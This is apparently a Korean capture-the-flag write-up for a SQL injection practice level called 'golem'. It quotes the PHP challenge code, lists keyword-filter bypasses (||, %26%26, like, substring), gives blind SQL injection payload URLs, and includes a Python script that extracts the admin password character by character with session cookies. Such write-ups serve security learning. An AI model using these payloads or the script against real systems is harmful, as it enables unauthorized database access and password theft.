query : {$query}
";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) echo "Hello {$result[id]}
";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'";
$result = @mysql_fetch_array(mysql_query($query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem");
highlight_file(__FILE__);
?>or and substr( =을 필터링하고 있다.
or->||을 사용하면 된다!
and->%26%26을 사용하면 된다!
=->like을 사용하면 된다!
substr->substring을 사용하면 된다!
Blind SQL injection으로 패스워드 길이와 패스워드 자체를 알아내면 끝!
?pw=1'||id like 'admin'%26%26length(pw)>5 --%20
?pw=1'||id like 'admin'%26%26substring(pw,1,1)>50 --%20
import requests
def main():
cookie={"__cfduid":"d282347679afbe7ce118657ef96dd67f61530072154","PHPSESSID":"25bfqp0uqr6pmep83spki2t522"}
query='https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php'
for i in range(1,9):
x=30
while(1):
x+=1
query_add=query+"?pw=1'||id like 'admin'%26%26substring(pw,"+str(i)+",1)>char("+str(x)+") --%20"
result=requests.get(query_add, cookies=cookie)
if(result.text.find("Hello")>1000):
print("GOOD "+str(i)+": "+chr(x))
break
if(__name__=="__main__"):
main()